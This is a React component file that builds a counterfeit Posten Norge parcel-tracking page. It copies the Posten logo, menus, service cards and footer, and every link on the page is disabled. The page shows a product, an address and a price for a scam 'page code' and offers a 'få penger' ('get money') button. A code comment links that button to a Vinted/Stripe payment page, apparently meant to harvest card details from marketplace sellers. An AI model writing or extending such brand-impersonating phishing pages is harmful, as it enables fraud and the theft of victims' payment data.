import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './PostenNoSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/posten-no-logo.svg`;

function noop(e) {
  e.preventDefault();
}

function IconSearch() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="10.5" cy="10.5" r="6.5" stroke="currentColor" strokeWidth="2" />
      <path d="M16 16l6 6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

function IconUser() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="12" cy="8" r="3.5" stroke="currentColor" strokeWidth="1.8" />
      <path d="M6 20c0-3.5 3-6 6-6s6 2.5 6 6" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" />
    </svg>
  );
}

function IconMenu() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path d="M4 7h16M4 12h16M4 17h16" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

/**
 * Posten Norge — spor + utbetaling; «få penger» → index2 (VintedStripe2).
 */
function PostenNoSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [trackVal, setTrackVal] = useState(pageCode || '');

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    setTrackVal(pageCode);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'NO').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'NOK';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceStr = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('nb-NO', {
      minimumFractionDigits: 0,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const productName = (pageData?.product_name || '').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const costLine = priceStr === '—' ? '—' : `${priceStr} ${sym}`;

  const onSpor = (e) => {
    e.preventDefault();
  };

  if (loading && pageCode) {
    return (
      <div className="postenno-wrap" lang="nb">
        <div className="postenno-loading">Laster…</div>
        <div className="postenno-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="postenno-wrap" lang="nb">
      <header className="postenno-header">
        <div className="postenno-header-inner">
          <a href="#/" className="postenno-logo-link" onClick={noop} aria-label="Posten">
            <img src={LOGO_SRC} alt="" className="postenno-logo" width={130} height={34} />
          </a>
          <nav className="postenno-nav" aria-label="Hovedmeny">
            <a href="#/" onClick={noop}>
              <IconSearch />
              Søk
            </a>
            <a href="#/" onClick={noop}>
              <IconUser />
              Min side
            </a>
            <a href="#/" onClick={noop}>
              <IconMenu />
              Meny
            </a>
          </nav>
        </div>
      </header>

      <div className="postenno-main">
        <table className="postenno-table">
          <tbody>
            <tr>
              <th scope="row">Produktnavn</th>
              <td>{productName}</td>
            </tr>
            <tr>
              <th scope="row">Leveringsadresse</th>
              <td>{address}</td>
            </tr>
            <tr>
              <th scope="row">Kostnad</th>
              <td>{costLine}</td>
            </tr>
          </tbody>
        </table>
        <div className="postenno-cta-wrap">
          <Link to={index2Path} className="postenno-cta">
            få penger
          </Link>
        </div>
      </div>

      <section className="postenno-hero">
        <div className="postenno-hero-city" aria-hidden />
        <div className="postenno-hero-van" aria-hidden />
        <div className="postenno-hero-inner">
          <h1>Spor pakken din!</h1>
          <p>Følg dine pakker med vår sporingstjeneste.</p>
          <form className="postenno-track" onSubmit={onSpor}>
            <input
              type="text"
              readOnly
              value={trackVal}
              placeholder="Skriv inn sporingsnummer"
              aria-label="Sporingsnummer"
            />
            <button type="submit">Spor</button>
          </form>
        </div>
      </section>

      <div className="postenno-cards">
        <div className="postenno-card">
          <h3>Sende brev under 350 g</h3>
          <p>Fra 18,- kroner</p>
        </div>
        <div className="postenno-card">
          <h3>Sende pakke 0–35 kg</h3>
          <p>Fra 70,- kroner</p>
        </div>
        <div className="postenno-card">
          <h3>Skal du flytte?</h3>
          <p>Meld adresseendringen til oss</p>
        </div>
      </div>

      <section className="postenno-promo">
        <div className="postenno-promo-inner">
          <div className="postenno-promo-art" aria-hidden />
          <div>
            <h2>Flere tusen nye pakkebokser i Norge</h2>
            <a href="#/" onClick={noop}>
              Finn pakkebokser nær deg
            </a>
          </div>
        </div>
      </section>

      <footer className="postenno-footer">
        <div className="postenno-footer-top">
          <img src={LOGO_SRC} alt="" className="postenno-footer-logo" width={130} height={32} />
          <div className="postenno-footer-grid">
            <div className="postenno-foot-col">
              <h4>Søk etter</h4>
              <a href="#/" onClick={noop}>
                Åpningstider
              </a>
              <a href="#/" onClick={noop}>
                Pakkebokser
              </a>
              <a href="#/" onClick={noop}>
                Innleveringspostkasser
              </a>
              <a href="#/" onClick={noop}>
                Adresser, postnummer og personer
              </a>
            </div>
            <div className="postenno-foot-col">
              <h4>Om oss</h4>
              <a href="#/" onClick={noop}>
                Om Posten Norge
              </a>
              <a href="#/" onClick={noop}>
                Jobb i Posten
              </a>
              <a href="#/" onClick={noop}>
                Kontakt oss
              </a>
            </div>
            <div className="postenno-foot-col">
              <h4>Nyttig</h4>
              <a href="#/" onClick={noop}>
                Falske SMS og e-post
              </a>
              <a href="#/" onClick={noop}>
                Priser
              </a>
              <a href="#/" onClick={noop}>
                Våre vilkår
              </a>
              <a href="#/" onClick={noop}>
                Nettmagasin: Enklere hverdag
              </a>
            </div>
          </div>
          <div className="postenno-foot-btns">
            <a href="#/" onClick={noop}>
              For bedrifter
            </a>
            <a href="#/" onClick={noop}>
              English site
            </a>
          </div>
        </div>
        <div className="postenno-foot-legal">
          <span>©Posten Norge</span>
          <a href="#/" onClick={noop}>
            Personvern og sikkerhet
          </a>
          <a href="#/" onClick={noop}>
            Cookies
          </a>
        </div>
      </footer>

      <div className="postenno-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default PostenNoSuccess;
